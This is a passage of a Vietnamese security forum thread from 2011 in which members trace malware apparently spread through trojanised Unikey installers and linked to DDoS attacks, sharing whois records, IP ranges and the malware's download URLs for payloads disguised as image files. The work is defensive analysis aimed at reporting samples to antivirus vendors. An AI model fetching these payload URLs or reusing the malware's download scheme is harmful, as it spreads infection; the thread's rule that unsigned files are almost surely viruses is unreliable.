Trong SysInternals Suite, có file sigcheck, để check signature của 1 PE file.
Chỉ cần sigcheck <file cần check>, nếu thấy unsigned thì gần như 95% là virus.

Trong WinDbg có tool symchk. Các file của MS gần như 100% đều có symbol file đặt trên Symbol Server của họ.
Cú pháp: symchk /v <file can check>
Nếu có .pdb, .dbg file về thì gần như an toàn, còn không có mà sigcheck fail nữa thì 100% mày là virus.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 11:00:43 (+0700) | #187 | 244280
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
@TQN: Ok a, e đã copy mấy file này sang một nơi khác và nén lại, phòng hờ khi cần.

Vậy sau 7 trang điều tra, mọi người đã có phương án gì để diệt đống này chưa ta ?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 11:22:22 (+0700) | #188 | 244282
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
2 lequy: à quên, anh đang phân tích DbEntry1.idx, nó còn vài thằng bà con nữa: DbEntry2.idx, DbEntry3.idx. Em cứ search DbEntry*.* rồi up lên nhen !

Đống này chắc chắn là "mèo què" của STL, mới hơn MsHelpCenter, build trong thời gian từ 4/3 đến 10/3.

Phương án anh đã đề nghị là cứ up hết lên cho các AVs để họ cập nhật.

Và dưới đây là hình tui đã debug được con DbEntry1.idx làm gì, down cái gì về:




Down advertise.gif về, giả mã ra PE file, execute nó.

Host express.blogdns.info có IP là: 91.211.118.119, vẫn còn sống nhăn răn, nhưng giờ này thì không mở port nào. Vì vậy nên advertise.gif em lấy về không được.

IPNetInfo cho ra thông tin sau:
Code:
inetnum: 91.211.116.0 - 91.211.119.255
netname: net-0x2a
descr: Zharkov Mukola Mukolayovuch
remarks: Datacentre "0x2a"
country: UA
org: ORG-PEZM1-RIPE
admin-c: ZN210-RIPE
tech-c: ZN210-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-lower: RIPE-NCC-END-MNT
mnt-by: ONIK-MNT
mnt-routes: ONIK-MNT
mnt-domains: ONIK-MNT
changed: <a href="mailto:support@netassist.kiev.ua">support@netassist.kiev.ua</a> 20081211
source: RIPE

organisation: ORG-PEZM1-RIPE
org-name: Private Entreprise Zharkov Mukola Mukolayovuch
org-type: OTHER
address: Ukraine, Kyiv, Entuziastov str. 29, of. 42
e-mail: <a href="mailto:support@0x2a.com.ua">support@0x2a.com.ua</a>
admin-c: ZN210-RIPE
phone: +38-044 587-83-16
mnt-ref: ONIK-MNT
mnt-by: ONIK-MNT
changed: <a href="mailto:support@netassist.kiev.ua">support@netassist.kiev.ua</a> 20091215
source: RIPE

person: Zharkov Nikolay
address: Ukraine, Kyiv, Entuziastov str. 29, of. 42
phone: +38-044 587-83-16
nic-hdl: ZN210-RIPE
mnt-by: ONIK-MNT
changed: <a href="mailto:support@netassist.kiev.ua">support@netassist.kiev.ua</a> 20081211
source: RIPE

% Information related to '91.211.116.0/22AS48587'

route: 91.211.116.0/22
descr: Datacentre "0x2a" Route object
origin: AS48587
mnt-by: ONIK-MNT
changed: <a href="mailto:pavel@antidot.ua">pavel@antidot.ua</a> 20081215
source: RIPE


UA: Ukraina. Không biết có liên quan tới tụi mafia Nga như anh PXMMRF đã nói không ?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 12:26:48 (+0700) | #189 | 244289
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
2 file còn lại nằm cùng thư mục, nhưng vì hôm qua nén lại mấy trăm mb nên e bỏ bớt.

http://www.mediafire.com/?7f9ag2r998797gl
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 12:31:01 (+0700) | #190 | 244290
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
Tối hôm qua mò vô direct.aliasx.net để xem thử "mệnh lệnh" hiện nay là gì thì không được vì "mệnh lệnh" biến đâu mất tiêu.

Hôm nay vô lại thì hoàn toàn không được. Hoá ra:


[conmale]$ whois aliasx.net

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: ALIASX.NET
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Whois Server: whois.PublicDomainRegistry.com
Referral URL: http://www.PublicDomainRegistry.com
Name Server: NS1.SURATIT.IN
Name Server: NS2.SURATIT.IN
Name Server: NS3.SURATIT.IN
Name Server: NS4.SURATIT.IN
Status: clientDeleteProhibited
Status: clientHold
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 25-jul-2011
Creation Date: 08-apr-2011
Expiration Date: 08-apr-2012

>>> Last update of whois database: Wed, 27 Jul 2011 05:50:48 UTC <<<


The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Registration Service Provided By: SH3LLS
Contact: +852.58080443
Website: http://www.sh3lls.net/

Domain Name: ALIASX.NET

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
ID#10760, PO Box 16
Note - All Postal Mails Rejected, visit Privacyprotect.org
Nobby Beach
null,QLD 4218
AU
Tel. +45.36946676

Creation Date: 08-Apr-2011
Expiration Date: 08-Apr-2012

Domain servers in listed order:
ns1.suratit.in
ns2.suratit.in
ns3.suratit.in
ns4.suratit.in


Administrative Contact:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
ID#10760, PO Box 16
Note - All Postal Mails Rejected, visit Privacyprotect.org
Nobby Beach
null,QLD 4218
AU
Tel. +45.36946676

Technical Contact:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
ID#10760, PO Box 16
Note - All Postal Mails Rejected, visit Privacyprotect.org
Nobby Beach
null,QLD 4218
AU
Tel. +45.36946676

Billing Contact:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
ID#10760, PO Box 16
Note - All Postal Mails Rejected, visit Privacyprotect.org
Nobby Beach
null,QLD 4218
AU
Tel. +45.36946676

Status:SUSPENDED


Hiện nay đám hosting iWeb và đám domain registrar "SH3LLS" này vẫn còn host một số "kho tàng" của STL. Đám này hết chơi OnlineNIC ở Hồng Kông rồi đến sh3lls cũng ở Hồng Kông, toàn là những nơi tàng chứa những domain frauds. Còn hosting thì kiếm mấy chỗ chai lì để chứa những thứ độc hại. Có lẽ STL nghĩ rằng chuyển sang núp bóng ở Hồng Kông thì tụi FBI không mó tay vô được chắc smilie .
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 12:42:34 (+0700) | #191 | 244292
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
@TQN: Trong mớ packet em capture thì cũng thấy URL này, và của e là đây:

http://fastupdate.dyndns-office.com/advertise.gif?cv=1&uv=1&uc=0&lrp=4&sye=0&v=0&id=08vWdU7mjkAqVg5oiy7O799iqUzTK46n&als=6D21494831435D&cn=LEQUY-PC&us=LeQuy&qmnhnqzdptpgwfkfkn=prplnfiydcrrmmshaxmypr
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 13:09:29 (+0700) | #192 | 244296
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
TQN wrote:


Host express.blogdns.info có IP là: 91.211.118.119, vẫn còn sống nhăn răn, nhưng giờ này thì không mở port nào. Vì vậy nên advertise.gif em lấy về không được.

IPNetInfo cho ra thông tin sau:
Code:
inetnum: 91.211.116.0 - 91.211.119.255
netname: net-0x2a
descr: Zharkov Mukola Mukolayovuch
remarks: Datacentre "0x2a"
country: UA
org: ORG-PEZM1-RIPE
admin-c: ZN210-RIPE
tech-c: ZN210-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-lower: RIPE-NCC-END-MNT
mnt-by: ONIK-MNT
mnt-routes: ONIK-MNT
mnt-domains: ONIK-MNT
changed: <a href="mailto:support@netassist.kiev.ua">support@netassist.kiev.ua</a> 20081211
source: RIPE

organisation: ORG-PEZM1-RIPE
org-name: Private Entreprise Zharkov Mukola Mukolayovuch
org-type: OTHER
address: Ukraine, Kyiv, Entuziastov str. 29, of. 42
e-mail: <a href="mailto:support@0x2a.com.ua">support@0x2a.com.ua</a>
admin-c: ZN210-RIPE
phone: +38-044 587-83-16
mnt-ref: ONIK-MNT
mnt-by: ONIK-MNT
changed: <a href="mailto:support@netassist.kiev.ua">support@netassist.kiev.ua</a> 20091215
source: RIPE

person: Zharkov Nikolay
address: Ukraine, Kyiv, Entuziastov str. 29, of. 42
phone: +38-044 587-83-16
nic-hdl: ZN210-RIPE
mnt-by: ONIK-MNT
changed: <a href="mailto:support@netassist.kiev.ua">support@netassist.kiev.ua</a> 20081211
source: RIPE

% Information related to '91.211.116.0/22AS48587'

route: 91.211.116.0/22
descr: Datacentre "0x2a" Route object
origin: AS48587
mnt-by: ONIK-MNT
changed: <a href="mailto:pavel@antidot.ua">pavel@antidot.ua</a> 20081215
source: RIPE


UA: Ukraina. Không biết có liên quan tới tụi mafia Nga như anh PXMMRF đã nói không ?




Anh nghĩ không phải mafia Nga gì đâu mà STL cũng có servers bên Ukraine (có lẽ nghĩ rằng host bên Ukraine thì tụi FBI không mó tay vô được smilie ). Chuỗi 91.211.116.0/22 kia cũng chứa trang "tuyệt tác" x-cafevn-db.info trước kia.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 13:24:53 (+0700) | #193 | 244298
texudo
Member
[Minus] 0 [Plus]
Joined: 20/07/2011 11:14:04
Bài gởi: 31
Offline
[Profile] [PM]
Qua thông tin X-Cafe và IP, search ra một đống Domain với IP bắt đầu bằng 91.211.116.*.

http://bgp.he.net/net/91.211.116.0/22#_dns

Chính xác là SINHTULENH rồi: 91.211.116.185 sinhtulenh.org, sinhtuphu.org

[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 13:31:31 (+0700) | #194 | 244299
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
lequi wrote:
@TQN: Trong mớ packet em capture thì cũng thấy URL này, và của e là đây:

http://fastupdate.dyndns-office.com/advertise.gif?cv=1&uv=1&uc=0&lrp=4&sye=0&v=0&id=08vWdU7mjkAqVg5oiy7O799iqUzTK46n&als=6D21494831435D&cn=LEQUY-PC&us=LeQuy&qmnhnqzdptpgwfkfkn=prplnfiydcrrmmshaxmypr


fastupdate.dyndns-office.com resolved về "204.13.248.126" và IP này nằm trong blacklist của nhiều database vì nổi tiếng malware. Nó bị "đóng cửa" từ hồi 2010. IP này trỏ tới hơn 500 hostname, toàn là những thứ "đầu trâu mặt ngựa" của Internet. Không biết phải có liên quan tới STL không.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 13:54:51 (+0700) | #195 | 244302
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Vậy là với con này, mình đã truy tới ổ của nó rồi.

Sorry nhiều anh em, con này down advertise.gif từ 4 host lận. Host nào down không được thì chuyển sang down từ host khác. Trưa nay buồn ngủ nên chỉ debug tới host đầu tiên, tưởng hết nên terminate luôn.
Code:
1. http://express.blogdns.info/advertise.gif?cv=1&uv=1&uc=0&lrp=0&sye=0&v=0&id=JF5RfuJw4q8Tbgri83V3FgetMfHLT24p&als=6D21494831435D&cn=abcde&us=abc

2. http://fastupdate.dyndns-office.com/advertise.gif?cv=1&uv=1&uc=0&lrp=0&sye=0&v=0&id=JF5RfuJw4q8Tbgri83V3FgetMfHLT24p&als=6D21494831435D&cn=abcde&us=abc

3. http://hot.enfaqs.com/advertise.gif?cv=1&uv=1&uc=0&lrp=0&sye=0&v=0&id=JF5RfuJw4q8Tbgri83V3FgetMfHLT24p&als=6D21494831435D&cn=abcde&us=abc

4. http://securelogin.doomdns.com/advertise.gif?cv=1&uv=1&uc=0&lrp=0&sye=0&v=0&id=JF5RfuJw4q8Tbgri83V3FgetMfHLT24p&als=6D21494831435D&cn=abc&us=abc


Cảm ơn lequy, cậu không nói thì chắc tui đã không biết và bỏ sót.
Trong 4 cái host trên, cái thì chết, cái thì đóng port 80. Chỉ còn một mình thằng fastupdate.dyndns-office.com là còn respond cho lệnh download, và nó chỉ trả về cho em cái này:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title>fastupdate.dyndns-office.com is offline</title></head>
<body><h1>fastupdate.dyndns-office.com is offline</h1><hr>
<p>fastupdate.dyndns-office.com is currently offline. Please try again later.</p>
</body></html>


Buồn thiệt, không thì anh em ta có được con bot mới nữa rồi.

Thôi, nhiệm vụ kế tiếp là up các mẫu MsHelpCenter còn rin extract từ "Unikey độc" (theo anh PXMMRF) của asaxin và BackupUtility lên KIS, MS, Avira...
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 14:34:38 (+0700) | #196 | 244305
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
conmale wrote:
PXMMRF wrote:

Ở Việt nam hiện nay, theo tôi, chỉ khoảng 5-8 % người cài win 7, còn lại hầu hết là Win XP. Trong số người cài Win 7, có lẽ tối đa là 30-40% người có thể nhiễm STL trojan thôi. Như thế khó mà tạo lập được mang STL bot với hàng trăm ngàn máy ở VN.



Hì hì, câu này anh Mai nói ngược rồi. Bởi vì hầu hết dùng Windows XP và chỉ có 5-8% dùng Windows 7 (trong số người dùng Windows 7 thỉ chỉ có 30-40% bị nhiễm) cho nên dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN.

Sau kết quả điều tra sơ khởi, em thấy cả hệ thống máy của một trường đại học đều ấn định người dùng có chủ quyền "Administrator" và hàng chục doanh nghiệp lớn/vừa cũng không tránh khỏi lỗ hổng này. Trong con số 20 người dùng máy bình mà em hỏi thăm thì 100% là chạy dưới chủ quyền "Administrator". Bởi vậy, dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN chớ không phải "khó" smilie .




Hì hì, câu này mình nói với ý khác. Vì axasin thông báo là cài cái Malicious Unikey mà bạn ấy download về chỉ tạo các file virus MSHelpCenter.* trong Windows 7 thôi , còn trong Win XP thì không được (nghĩa là Win XP thì không bị nhiễm virus khi cài malicious Unikey nói trên). Vì số người ở VN dùng Win 7 còn ít, nên tôi suy diễn tiếp theo ý axasin như vậy (cũng có ý rỡn vui với rang0 chút chút)

Đây là suy diễn theo nhận định của axasin. Chứ tôi đương nhiên là không nghĩ như vậy. Tôi nghĩ máy trên mạng VN hầu hết là cài Win XP và tỷ lệ máy cài Win XP bị nhiễm STL virus-trojan là rất cao.
Cần nói thêm là hiện đang có nhiều loại (version) malicious Unikey và Vietkey trên mạng. Malicious Unikey mà axasin cài khác với của lequi đã cài. Còn có nhiều malicious Unikey khác trên mang nũa. Kinh!

[Hì hì các bác đừng gọi là "fake Unikey", vì nó vẫn dùng được để đánh chữ Việt mà. Nên gọi là malicious Unikey (Unikey độc). Giả thì không dùng đươc. Nhưng Unikey nhiễm độc (malicious) thì vẫn dùng được, nhưng lai nguy hiểm cho ta hơn ngàn lần. Hì hì. Nhưng đây chỉ là khuyến cáo vui thôi!]

Đúng là hầu hết máy tính cá nhân ở Việt nam (tai tư gia, cơ quan) đều cài đặt cho user dưới quyến admin.. Win XP rõ ràng là cũng hỗ trợ việc này thưc hiện dễ dàng trong quá trình cài đặt nó. Việc phân quyên cho user trên Win XP còn đơn giản và thiếu bảo mật hơn Win 2000.
Nhưng nghĩ lai thì lại thấy khó: máy riêng của nó, hay phân cho mình nó dùng tại cơ quan, thì hà cớ gì bắt nó chỉ đươc dùng account restricted hay account limited. Khó thật.

Chuyên vui (có thưc): Vừa qua công ty tôi các máy tính bị nhiễm virus nặng nề, lây lan lung tung, mất dữ liêu, do anh em có quyền admin. tự động cài nhiều chương trình game, nghe nhạc nhiễm virus. Tôi nổi điên lên, yêu cầu tất cả công ty mang máy lên văn phòng để phân quyên lại: không cho dùng quyên admin, chỉ cho dùng quyền restricted hay limited. Gần trăm máy mang lên, xếp hàng, trông hết hồn. Lệnh đã ra phải làm, không kỳ. Tôi và 2 lão Kỹ sư IT phải mất gần 3 ngày để phân quyền, dọn dep rác rưởi, update antivirus và cài lai các máy in, máy scan, nâng cấp RAM.... Mệt quá. Nhưng rõ ràng sau đó tình hình đỡ hơn nhiều. Gần đây lai phải tổ chức 1 lớp hoc sử dung máy tính trong nôi bộ cơ quan.....

To "TQN". Ucraina có một mối quan hệ rất sâu sắc với TQ, đăc biệt trong thời kỳ tổng thống cũ, khi mà môi quan hệ giữa Nga và Ukrain xấu, rạn nứt. TQ trơ giúp Ucrain rất nhiều về Ktế và đầu tư một số vốn khá lơn vào nước này




The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 15:35:12 (+0700) | #197 | 244310
PXMMRF
Administrator
Joined: 26/09/2002 07:17:55
Bài gởi: 946
Offline
[Profile] [PM]
Như vậy là cho đến nay chúng ta đã phát hiện ra khoảng 10 domain STL sử dung cho 10 master website-webserver khác nhau.

Một số website-webserver đã tạm thời ngưng hoăc mất domain.

Vấn đề chúng ta chưa xác định thật rõ là website-webserver nào đang in-charge (đang làm nhiệm vụ DDoS), như đang DDoS vào HVA chẳng hạn, cái nào đã thôi dùng.?

Chúng ta cũng chưa phân tích và tổng hơp các thông tin về nguồn (website, webserver) mà STL hay người khác (bị STL lơi dung) dùng để phát tán virus, thí dụ http://nethoabinh.com/ mà lequi đã xác nhận.

Về virus-trojan chúng ta cũng còn chưa rõ là ngoài nhóm file MShelpcenter.*... tạo ra từ malicious Unikey mà lequi download về từ đường dẫn của http://nethoabinh.com/, có còn có các nhóm file loại khác, tên khác nhưng công dung tương tự không?. MShelpcenter.* files có là những file mới nhất của STL không.?

STL cũng nhúng virus-Trojan vào các file Vietkey (2000-2002-2007) đang được upload rất nhiêu trên mạng. Chúng đươc STL nhúng vào các virus-trojan loai gì, có giống như ở Unikey không?
Còn phải kể những file Adobe flash Player dễ dàng download trên mạng, cũng thường bị STL nhúng virus-trojan vào.

Rõ ràng đang còn rất nhiều vấn đề cần phải nghiên cứu, tìm hiểu và giải quyết.


The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 15:45:11 (+0700) | #198 | 244312
acoustics89
Member
[Minus] 0 [Plus]
Joined: 08/07/2011 10:17:19
Bài gởi: 50
Offline
[Profile] [PM]
Bận quá, giờ mới mò vào xem được, topic tăng nhanh quá. Hay bây giờ thành lập 1 đội đi ạ, phân công ai phân tích cái gì. Chứ bây giờ ví dụ như em tải cái bộ Backup của bạn Lequi về phân tích cũng mất công, vì đa số anh em khác làm rồi.
nhưng kể ra làm 1 đội cũng khó, vì đa phần anh em dùng thời gian rảnh để làm, có người bận lúc này lúc khác

Các anh có ý kiến gì để làm việc hiệu quả hơn không
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 16:00:12 (+0700) | #199 | 244314
rang0
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:55:47
Bài gởi: 19
Offline
[Profile] [PM]
Gửi anh PXMMRF,

Hôm nay em ngồi đọc lại, thấy còn 1 bộ Unikey "độc" mà gần đây nhất được upload trên trang download.com.vn, hình như nay đã được gỡ xuống, chính nó drop ra file TeamViewer "giả" và file uxtheme.manifest "giả". Vào thời điểm anh TQN phân tích thì cái server của nó vẫn còn sống, và anh TQN có down về được 2 files : flower.bmp và BlueSphere.bmp.

File BlueSphere.bmp decrypt ra nó chính là 1 file .exe, mạo danh thành file svchost.exe, tại thời điểm đó thì file .exe này chưa làm gì cả, và sẽ được cập nhật trong thời gian không xa. Hiện tại bọn STL đang "tạm thời" off server đó, chỉ không biết một ngày đẹp trời nào đó nó sẽ được bật lại để cập nhật hay không mà thôi ? Hay bọn chúng đành hi sinh con malware và server này vì bị phát hiện quá sớm.

Code:
URL1: http://speed.cyline.org:443/flower.bmp?g={1CD70F27-EA66-4812-834C-FB39AE2DC170}&c=1&v=1&tf=312218282815&tr=312218282861&t=312218282864&p=2&e=0&n=ThangChaMayTuiSTL&u=OngNoiMayNe&lfhbbnwdbywxlineyegfswjxylrktvvfjqlr=vznmbfhxpgocvojqhosgdbenhrjtnglagonsvca
URL2: http://speed.cyline.org:443/BlueSphere.bmp?dl=1&oyeerpsaahqumkthxeswvwlfdxpizmffsfk=njhkmdjqlnkwmrofymzmxgqf
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 16:13:25 (+0700) | #200 | 244318
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
Tớ vừa thử nghiệm thì 3 copies khác nhau của unikey download từ
- nethoabinh.com
- code.google.com: http://code.google.com/p/vietnam-unikey/downloads/detail?name=Uk40RC1ntSetup.exe&can=2&q=
- sourceforge: http://en.sourceforge.jp/projects/sfnet_unikey/downloads/unikey-win/4.0%20RC1/Uk40RC1ntSetup.exe/)

đều y như nhau và đều là malware..

Bản trên code.google.com được upload ngày 17 tháng 3 năm 2010.
Bản trên sourceforge được upload ngày 19 tháng 4 năm 2006.

Cả ba bản trên có y hệt checksum và nội dung y hêt nhau.

Chỉ còn 1 cách là gởi thông tin đến tất cả các cty antivirus.

What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 16:18:57 (+0700) | #201 | 244319
rang0
Member
[Minus] 0 [Plus]
Joined: 25/07/2011 10:55:47
Bài gởi: 19
Offline
[Profile] [PM]
conmale wrote:

- sourceforge: http://en.sourceforge.jp/projects/sfnet_unikey/downloads/unikey-win/4.0%20RC1/Uk40RC1ntSetup.exe/)



Em vừa down thử từ nguồn này về, thấy nó sạch mà anh !?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 16:26:15 (+0700) | #202 | 244320
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
acoustics89 wrote:
Bận quá, giờ mới mò vào xem được, topic tăng nhanh quá. Hay bây giờ thành lập 1 đội đi ạ, phân công ai phân tích cái gì. Chứ bây giờ ví dụ như em tải cái bộ Backup của bạn Lequi về phân tích cũng mất công, vì đa số anh em khác làm rồi.
nhưng kể ra làm 1 đội cũng khó, vì đa phần anh em dùng thời gian rảnh để làm, có người bận lúc này lúc khác

Các anh có ý kiến gì để làm việc hiệu quả hơn không


Anh nghĩ có 3 mảng để lo:

1. RE.
2. Trace net và xác định mạng hoạt động của malware.
3. Report cho các nhóm antiviruses và các nhóm chức năng.

Nếu cần làm việc hữu hiệu có lẽ cần phải tạo một group list (dùng google group chẳng hạn). Trong đó, thành viên của nhóm liên lạc qua group và chỉ nên công bố thông tin trên diễn đàn sau khi tìm ra kết quả hoặc nếu cần các thành viên trên diễn đàn đóng góp thêm thông tin, mẫu mã.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 16:26:28 (+0700) | #203 | 244321
mv1098
Member
[Minus] 0 [Plus]
Joined: 18/07/2009 14:19:13
Bài gởi: 119
Offline
[Profile] [PM]
conmale wrote:
Tớ vừa thử nghiệm thì 3 copies khác nhau của unikey download từ
- sourceforge: http://en.sourceforge.jp/projects/sfnet_unikey/downloads/unikey-win/4.0%20RC1/Uk40RC1ntSetup.exe/)

đều y như nhau và đều là malware..

Bản trên code.google.com được upload ngày 17 tháng 3 năm 2010.
Bản trên sourceforge được upload ngày 19 tháng 4 năm 2006.

Cả ba bản trên có y hệt checksum và nội dung y hêt nhau.

Chỉ còn 1 cách là gởi thông tin đến tất cả các cty antivirus.




Thằng này em chạy cũng sạch luôn, ko thấy sinh ra mấy cái folder với file .exe nào cả
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 16:30:44 (+0700) | #204 | 244322
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
rang0 wrote:
conmale wrote:

- sourceforge: http://en.sourceforge.jp/projects/sfnet_unikey/downloads/unikey-win/4.0%20RC1/Uk40RC1ntSetup.exe/)



Em vừa down thử từ nguồn này về, thấy nó sạch mà anh !?


Lạ vậy? Anh download từ nguồn sourceforge ở trên, cái binary y hệt như từ trang nethoabinh.com. Không lẽ anh download bản bị cached ở đâu đó chớ không phải bản chính thức từ sourceforge?
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 16:39:08 (+0700) | #205 | 244323
mv1098
Member
[Minus] 0 [Plus]
Joined: 18/07/2009 14:19:13
Bài gởi: 119
Offline
[Profile] [PM]
@TQN

http://fastupdate.dyndns-office.com/

Emm có vào site này có thông báo

Code:
fastupdate.dyndns-office.com is offline

fastupdate.dyndns-office.com is currently offline. Please try again later.


Theo em host này đã đc cấu hình, nếu không đúng User-Agent nó sẽ redirect sang cái thông báo trên

Còn cái thông báo đó chỉ để "lừa tình" mọi người thôi, mọi người sẽ nghĩ nó offline thật, vì theo em biết dyndns không hỗ trợ những thông báo như vậy
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 16:53:28 (+0700) | #206 | 244324
mv1098
Member
[Minus] 0 [Plus]
Joined: 18/07/2009 14:19:13
Bài gởi: 119
Offline
[Profile] [PM]
Check từ http://fastupdate.dyndns-office.com/ nó ra cái này

Code:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.k9activewear.com/request.php?remote_socket=tcp://xxxxxxxxxxx">here</a>.</p>
<hr>
<address>Apache/2.2.3 (CentOS) Server at 216.55.166.13 Port 80</address>
</body></html>


Check cái http://www.k9activewear.com

Code:
Registrar: GODADDY.COM, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Status: clientDeleteProhibited, clientRenewProhibited, clientTransferProhibited, clientUpdateProhibited

Expiration Date: 2012-07-04
Creation Date: 2011-07-04
Last Update Date: 2011-07-04

Name Servers:
ns77.domaincontrol.com
ns78.domaincontrol.com
See k9activewear.com DNS Records

Information Updated: Wed, 27 Jul 2011 10:47:41 UTC


Creation Date: 2011-07-04 <-- Mới tinh luôn
Lại Prohibited hehe mấy anh này nguỵ trang kiểu ÚC rồi
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 17:06:51 (+0700) | #207 | 244325
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
@mv1098: Mình đã thử thay đổi User-Agent cho đúng với User-Agent mà "bọn" virus request, nhưng vẫn ra 1 kết quả đó. Vả lại trong quá tình capture packet, kết quả trả về vẫn giống với kết quả truy cập từ trình duyệt.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 17:13:45 (+0700) | #208 | 244326
mv1098
Member
[Minus] 0 [Plus]
Joined: 18/07/2009 14:19:13
Bài gởi: 119
Offline
[Profile] [PM]
Mình vào thẳng ip http://204.13.248.126/ nó cũng thông báo như vậy, check port 80 vẫn thấy open

Có lẽ chủ host đã thay đổi User-Agent hoặc muốn giữ lại cái host này nên mới để thông báo như vậy chứ không tắt hẳn đi như mấy host khác
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 17:57:05 (+0700) | #209 | 244327
exception
Member
[Minus] 0 [Plus]
Joined: 10/07/2011 23:48:25
Bài gởi: 15
Offline
[Profile] [PM]
Cái IP đó là của offline.mydyndns.org. Bọn STL dùng dynamic dns, giờ nó cho dịch vụ update dns dynamic off rồi, thì tụi dyndns nó báo redirect về domain đó; hoặc nó redirect DNS về đó, không có gì đặc biệt ở cái DNS này đâu.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 19:40:50 (+0700) | #210 | 244330
ga_cum06
Member
[Minus] 0 [Plus]
Joined: 04/05/2008 19:01:15
Bài gởi: 29
Offline
[Profile] [PM]
